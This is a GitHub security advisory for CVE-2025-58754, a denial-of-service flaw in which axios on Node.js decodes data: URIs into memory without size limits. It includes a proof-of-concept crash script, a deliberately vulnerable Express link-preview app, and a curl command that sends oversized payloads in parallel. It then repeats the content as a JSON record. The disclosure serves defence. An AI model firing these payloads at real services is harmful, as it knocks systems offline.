ghsa-4hjh-wcwx-xvwj
Vulnerability from github
Summary
When Axios runs on Node.js and is given a URL with the data:
scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (Buffer
/Blob
) and returns a synthetic 200 response.
This path ignores maxContentLength
/ maxBodyLength
(which only protect HTTP responses), so an attacker can supply a very large data:
URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested responseType: 'stream'
.
Details
The Node adapter (lib/adapters/http.js
) supports the data:
scheme. When axios
encounters a request whose URL starts with data:
, it does not perform an HTTP request. Instead, it calls fromDataURI()
to decode the Base64 payload into a Buffer or Blob.
Relevant code from [httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231)
:
```js const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls); const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined); const protocol = parsed.protocol || supportedProtocols[0];
if (protocol === 'data:') { let convertedData; if (method !== 'GET') { return settle(resolve, reject, { status: 405, ... }); } convertedData = fromDataURI(config.url, responseType === 'blob', { Blob: config.env && config.env.Blob }); return settle(resolve, reject, { data: convertedData, status: 200, ... }); } ```
The decoder is in [lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27)
:
js
export default function fromDataURI(uri, asBlob, options) {
...
if (protocol === 'data') {
uri = protocol.length ? uri.slice(protocol.length + 1) : uri;
const match = DATA_URL_PATTERN.exec(uri);
...
const body = match[3];
const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');
if (asBlob) { return new _Blob([buffer], {type: mime}); }
return buffer;
}
throw new AxiosError('Unsupported protocol ' + protocol, ...);
}
- The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.
- It does not honour
config.maxContentLength
orconfig.maxBodyLength
, which only apply to HTTP streams. - As a result, a
data:
URI of arbitrary size can cause the Node process to allocate the entire content into memory.
In comparison, normal HTTP responses are monitored for size, the HTTP adapter accumulates the response into a buffer and will reject when totalResponseBytes
exceeds [maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550)
. No such check occurs for data:
URIs.
PoC
```js const axios = require('axios');
async function main() { // this example decodes ~120 MB const base64Size = 160_000_000; // 120 MB after decoding const base64 = 'A'.repeat(base64Size); const uri = 'data:application/octet-stream;base64,' + base64;
console.log('Generating URI with base64 length:', base64.length); const response = await axios.get(uri, { responseType: 'arraybuffer' });
console.log('Received bytes:', response.data.length); }
main().catch(err => { console.error('Error:', err.message); }); ```
Run with limited heap to force a crash:
bash
node --max-old-space-size=100 poc.js
Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error:
<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
1: 0x… node::Abort() …
…
Mini Real App PoC:
A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs which axios fully ignore maxContentLength
, maxBodyLength
and decodes into memory on Node before streaming enabling DoS.
```js import express from "express"; import morgan from "morgan"; import axios from "axios"; import http from "node:http"; import https from "node:https"; import { PassThrough } from "node:stream";
const keepAlive = true; const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 }); const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 }); const axiosClient = axios.create({ timeout: 10000, maxRedirects: 5, httpAgent, httpsAgent, headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" }, validateStatus: c => c >= 200 && c < 400 });
const app = express(); const PORT = Number(process.env.PORT || 8081); const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";
app.use(express.json({ limit: BODY_LIMIT })); app.use(morgan("combined"));
app.get("/healthz", (req,res)=>res.send("ok"));
/*
* POST /preview { "url": "
app.post("/preview", async (req, res) => { const url = req.body?.url; if (!url) return res.status(400).json({ error: "missing url" });
let u; try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); }
// Developer allows using data:// in the allowlist const allowed = new Set(["http:", "https:", "data:"]); if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });
const controller = new AbortController(); const onClose = () => controller.abort(); res.on("close", onClose);
const before = process.memoryUsage().heapUsed;
try { const r = await axiosClient.get(u.toString(), { responseType: "stream", maxContentLength: 8 * 1024, // Axios will ignore this for data: maxBodyLength: 8 * 1024, // Axios will ignore this for data: signal: controller.signal });
// stream only the first 64KB back
const cap = 64 * 1024;
let sent = 0;
const limiter = new PassThrough();
r.data.on("data", (chunk) => {
if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }
else { sent += chunk.length; limiter.write(chunk); }
});
r.data.on("end", () => limiter.end());
r.data.on("error", (e) => limiter.destroy(e));
const after = process.memoryUsage().heapUsed;
res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
limiter.pipe(res);
} catch (err) { const after = process.memoryUsage().heapUsed; res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2)); res.status(502).json({ error: String(err?.message || err) }); } finally { res.off("close", onClose); } });
app.listen(PORT, () => {
console.log(axios-poc-link-preview listening on http://0.0.0.0:${PORT}
);
console.log(Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).
);
});
Run this app and send 3 post requests:
sh
SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB10241024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \
| tee payload.json >/dev/null
seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null
Suggestions
-
Enforce size limits For
protocol === 'data:'
, inspect the length of the Base64 payload before decoding. Ifconfig.maxContentLength
orconfig.maxBodyLength
is set, reject URIs whose payload exceeds the limit. -
Stream decoding Instead of decoding the entire payload in one
Buffer.from
call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.
{ "affected": [ { "package": { "ecosystem": "npm", "name": "axios" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.12.0" } ], "type": "ECOSYSTEM" } ] } ], "aliases": [ "CVE-2025-58754" ], "database_specific": { "cwe_ids": [ "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2025-09-11T21:07:55Z", "nvd_published_at": "2025-09-12T02:15:46Z", "severity": "HIGH" }, "details": "## Summary\n\nWhen Axios runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response.\nThis path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: \u0027stream\u0027`.\n\n## Details\n\nThe Node adapter (`lib/adapters/http.js`) supports the `data:` scheme. When `axios` encounters a request whose URL starts with `data:`, it does not perform an HTTP request. Instead, it calls `fromDataURI()` to decode the Base64 payload into a Buffer or Blob.\n\nRelevant code from [`[httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):\n\n```js\nconst fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);\nconst parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);\nconst protocol = parsed.protocol || supportedProtocols[0];\n\nif (protocol === \u0027data:\u0027) {\n let convertedData;\n if (method !== \u0027GET\u0027) {\n return settle(resolve, reject, { status: 405, ... });\n }\n convertedData = fromDataURI(config.url, responseType === \u0027blob\u0027, {\n Blob: config.env \u0026\u0026 config.env.Blob\n });\n return settle(resolve, reject, { data: convertedData, status: 200, ... });\n}\n```\n\nThe decoder is in [`[lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):\n\n```js\nexport default function fromDataURI(uri, asBlob, options) {\n ...\n if (protocol === \u0027data\u0027) {\n uri = protocol.length ? uri.slice(protocol.length + 1) : uri;\n const match = DATA_URL_PATTERN.exec(uri);\n ...\n const body = match[3];\n const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? \u0027base64\u0027 : \u0027utf8\u0027);\n if (asBlob) { return new _Blob([buffer], {type: mime}); }\n return buffer;\n }\n throw new AxiosError(\u0027Unsupported protocol \u0027 + protocol, ...);\n}\n```\n\n* The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.\n* It does **not** honour `config.maxContentLength` or `config.maxBodyLength`, which only apply to HTTP streams.\n* As a result, a `data:` URI of arbitrary size can cause the Node process to allocate the entire content into memory.\n\nIn comparison, normal HTTP responses are monitored for size, the HTTP adapter accumulates the response into a buffer and will reject when `totalResponseBytes` exceeds [`[maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for `data:` URIs.\n\n\n## PoC\n\n```js\nconst axios = require(\u0027axios\u0027);\n\nasync function main() {\n // this example decodes ~120 MB\n const base64Size = 160_000_000; // 120 MB after decoding\n const base64 = \u0027A\u0027.repeat(base64Size);\n const uri = \u0027data:application/octet-stream;base64,\u0027 + base64;\n\n console.log(\u0027Generating URI with base64 length:\u0027, base64.length);\n const response = await axios.get(uri, {\n responseType: \u0027arraybuffer\u0027\n });\n\n console.log(\u0027Received bytes:\u0027, response.data.length);\n}\n\nmain().catch(err =\u003e {\n console.error(\u0027Error:\u0027, err.message);\n});\n```\n\nRun with limited heap to force a crash:\n\n```bash\nnode --max-old-space-size=100 poc.js\n```\n\nSince Node heap is capped at 100 MB, the process terminates with an out-of-memory error:\n\n```\n\u003c--- Last few GCs ---\u003e\n\u2026\nFATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory\n1: 0x\u2026 node::Abort() \u2026\n\u2026\n```\n\nMini Real App PoC:\nA small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs which axios fully ignore `maxContentLength `, `maxBodyLength` and decodes into memory on Node before streaming enabling DoS.\n\n```js\nimport express from \"express\";\nimport morgan from \"morgan\";\nimport axios from \"axios\";\nimport http from \"node:http\";\nimport https from \"node:https\";\nimport { PassThrough } from \"node:stream\";\n\nconst keepAlive = true;\nconst httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });\nconst httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });\nconst axiosClient = axios.create({\n timeout: 10000,\n maxRedirects: 5,\n httpAgent, httpsAgent,\n headers: { \"User-Agent\": \"axios-poc-link-preview/0.1 (+node)\" },\n validateStatus: c =\u003e c \u003e= 200 \u0026\u0026 c \u003c 400\n});\n\nconst app = express();\nconst PORT = Number(process.env.PORT || 8081);\nconst BODY_LIMIT = process.env.MAX_CLIENT_BODY || \"50mb\";\n\napp.use(express.json({ limit: BODY_LIMIT }));\napp.use(morgan(\"combined\"));\n\napp.get(\"/healthz\", (req,res)=\u003eres.send(\"ok\"));\n\n/**\n * POST /preview { \"url\": \"\u003chttp|https|data URL\u003e\" }\n * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).\n */\n\napp.post(\"/preview\", async (req, res) =\u003e {\n const url = req.body?.url;\n if (!url) return res.status(400).json({ error: \"missing url\" });\n\n let u;\n try { u = new URL(String(url)); } catch { return res.status(400).json({ error: \"invalid url\" }); }\n\n // Developer allows using data:// in the allowlist\n const allowed = new Set([\"http:\", \"https:\", \"data:\"]);\n if (!allowed.has(u.protocol)) return res.status(400).json({ error: \"unsupported scheme\" });\n\n const controller = new AbortController();\n const onClose = () =\u003e controller.abort();\n res.on(\"close\", onClose);\n\n const before = process.memoryUsage().heapUsed;\n\n try {\n const r = await axiosClient.get(u.toString(), {\n responseType: \"stream\",\n maxContentLength: 8 * 1024, // Axios will ignore this for data:\n maxBodyLength: 8 * 1024, // Axios will ignore this for data:\n signal: controller.signal\n });\n\n // stream only the first 64KB back\n const cap = 64 * 1024;\n let sent = 0;\n const limiter = new PassThrough();\n r.data.on(\"data\", (chunk) =\u003e {\n if (sent + chunk.length \u003e cap) { limiter.end(); r.data.destroy(); }\n else { sent += chunk.length; limiter.write(chunk); }\n });\n r.data.on(\"end\", () =\u003e limiter.end());\n r.data.on(\"error\", (e) =\u003e limiter.destroy(e));\n\n const after = process.memoryUsage().heapUsed;\n res.set(\"x-heap-increase-mb\", ((after - before)/1024/1024).toFixed(2));\n limiter.pipe(res);\n } catch (err) {\n const after = process.memoryUsage().heapUsed;\n res.set(\"x-heap-increase-mb\", ((after - before)/1024/1024).toFixed(2));\n res.status(502).json({ error: String(err?.message || err) });\n } finally {\n res.off(\"close\", onClose);\n }\n});\n\napp.listen(PORT, () =\u003e {\n console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);\n console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);\n});\n```\nRun this app and send 3 post requests:\n```sh\nSIZE_MB=35 node -e \u0027const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString(\"base64\"); process.stdout.write(JSON.stringify({url:\"data:application/octet-stream;base64,\"+b}))\u0027 \\\n| tee payload.json \u003e/dev/null\nseq 1 3 | xargs -P3 -I{} curl -sS -X POST \"$URL\" -H \u0027Content-Type: application/json\u0027 --data-binary @payload.json -o /dev/null```\n```\n\n---\n\n## Suggestions\n\n1. **Enforce size limits**\n For `protocol === \u0027data:\u0027`, inspect the length of the Base64 payload before decoding. If `config.maxContentLength` or `config.maxBodyLength` is set, reject URIs whose payload exceeds the limit.\n\n2. **Stream decoding**\n Instead of decoding the entire payload in one `Buffer.from` call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.", "id": "GHSA-4hjh-wcwx-xvwj", "modified": "2025-09-15T14:19:44Z", "published": "2025-09-11T21:07:55Z", "references": [ { "type": "WEB", "url": "https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58754" }, { "type": "WEB", "url": "https://github.com/axios/axios/pull/7011" }, { "type": "WEB", "url": "https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593" }, { "type": "PACKAGE", "url": "https://github.com/axios/axios" }, { "type": "WEB", "url": "https://github.com/axios/axios/releases/tag/v1.12.0" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "type": "CVSS_V3" } ], "summary": "Axios is vulnerable to DoS attack through lack of data size check" }
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.